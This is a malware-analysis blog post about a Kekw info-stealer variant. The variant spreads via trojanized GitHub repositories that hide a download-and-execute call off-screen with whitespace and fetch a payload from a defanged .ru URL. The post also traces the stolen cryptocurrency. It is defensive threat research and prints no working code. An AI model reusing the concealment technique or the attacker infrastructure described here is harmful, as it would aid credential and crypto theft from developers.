A new warrior has entered the ring
Last week, I released my blog “Kekw keeps evolving” detailing how the Kekw malware was being spread via trojanized tools on GitHub where a malicious PyPi package is downloaded and executed to steal all kinds of information from the user running the tool.
While working on that blog, I noticed on 28 May that another GitHub account (Sammy3003) uploaded several new repositories that were identical to the ones analysed previously.
The account was created on 13 March 2021 with no activity until January 2023, when two non-malicious repositories were created. One contained several, but identical, template files for a resume, the other repository contains the account’s GitHub config file.
With no additional activity until end of May, this GitHub account likely got compromised and is now being used for malicious purposes.
The threat actor uploads 5 repositories:
Except for “Tron-Sweeper”, the other repositories were also present in the GitHub accounts analysed in my previous blog.
The command to download additional malicious code is hidden by moving it out of sight, at least when the text is not wrapped.
-The green rectangle shows only legitimate imports (keep this in mind for later)
-The red rectangle shows the entire horizontal scroll bar
-The blue rectangle shows that the scroll box is very small compared to the scroll bar
What could be the reason for the scroll box being so small?
Going through the code, there is nothing that could explain this behaviour such as a very long base64 encoded command or code encrypted with Fernet as seen in my previous blog.
Switching to “raw” code mode, no endless scrolling is needed as the malicious code that downloads a second stage becomes visible immediately.
Compare the code that’s in the green rectangle from the screenshot above, with the code that’s shown when in raw mode.
That was pretty easy! It looks like the Python script downloads and executes a script which is retrieved from hxxps://bananasquad[.]ru/paste.
Analysing the website with VirusTotal on 28 May, we get a clean sheet.
On Friday 2 June, the URL is already marked by seven vendors as malicious.
Looking up some information about the domain, we find that bananasquad[.]ru was registered only weeks ago. To be precise, two weeks before the repositories were uploaded on the GitHub account of Sammy3003.
Let’s compare the whois records of kekwltd[.]ru and bananasquad[.]ru.
The domain kekwltd[.]ru was used in the malware samples analysed in the previous blog and explains how the malware received its name.
The new domain bananasquad[.]ru is used in this malware sample, and inspired the title of this blog.
Whois record for kekwltd.ru
Whois record for bananasquad.ru
Both domains are registered by a “Private Person”, both using Cloudflare as nameserver, and they’re both registered at the same registrar. R01-RU is the first accredited registrar in the national domain RU, according to their own website and they claim to be one of the leaders in .RU, .SU, and .РФ domains.
Let’s see who you really are
Using urlscan.io, it’s possible to retrieve the script from the bananasquad URL. On first glance, it looks really familiar to what we’ve seen before in the “Kekw keeps evolving” blog. If you haven’t read that blog, give it a read to make sure you know what it’s all about.
After looking at it a bit more in-depth, we can see that the code mostly matches with the latest version of the PyPi package syssqlitedbpackageV1. However, the last 16 lines of the code from syssqlitedbpackageV1 is not present anymore.
Left side: syssqlitedbpackageV1
Right side: bananasquad[.]ru/paste
The Fernet encrypted command also makes a return in this new version. Due to the length of the command, it was omitted from the code comparison above.
Let’s look at what we can find when we decrypt the Fernet command.
Again, the script we get after decrypting is mostly the same. Only containing changes to reflect the new domain as well as new crypto addresses for the crypto replace functionality.
Changes to the code for the new domain and removal of other kekw references in the code:
Changes to the crypto addresses used to replace any copied crypto addresses by the victim:
The threat actor is even too lazy to change the version number:
The account Sammy3003 gets deleted by GitHub within 72 hours after upload of the malicious repositories.
Follow the money
When analysing the crypto addresses for money flowing in or out, there’s only a couple of transactions for the Bitcoin and the Ethereum addresses. Date last checked; 2 June 2023.
No transactions on Monero, Cardano or Dash.
-0.8058667 BTC is received on 17 May
-0.02486524 is sent on 17 May
-0.02491276BTC is sent on 17 May
-0.03009624BTC is sent on 17 May
-0.00071243BTC is sent on 29 May
The transaction on 29 May sticks out, even though it’s the smallest amount. When following that transaction, after several hops, the money is send to the Bitcoin address 37jAAWEdJ9D9mXybRobcveioxSkt7Lkwog. Through OSINT, we can identify that this wallet belongs to the crypto exchange ChangeNow.io.
-1.23ETH is received on 20 May
-1.23ETH is sent on 29 May
Again, we see an outgoing transaction on 29 May. Let’s track the transaction to the wallet it’s sent to (0x69b2bba5dc9d0f68ce0ae98395f72cefad7e543a). 5 minutes after the money has been transferred, it again gets sent to another wallet. This time it goes to 0x077d360f11d220e4d5d831430c81c26c9be7c4a4. This wallet contains a lot of money and has made many transactions in its lifetime. Using OSINT, we can again link this wallet to the same crypto exchange (ChangeNow.io) as with the Bitcoin money flow.
It looks like the threat actor is using this exchange to gather any stolen currency.
As this GitHub account and rebranded malware was very short-lived and lesser in quantity when it comes to GitHub accounts and repositories, the stolen amount of crypto currency is also way less compared to the Kekw variant.
Based on the analysis made in this blog, I suspect this to be the same threat actor and not a different threat actor using the same malware bought from a Malware-as-a-Service vendor.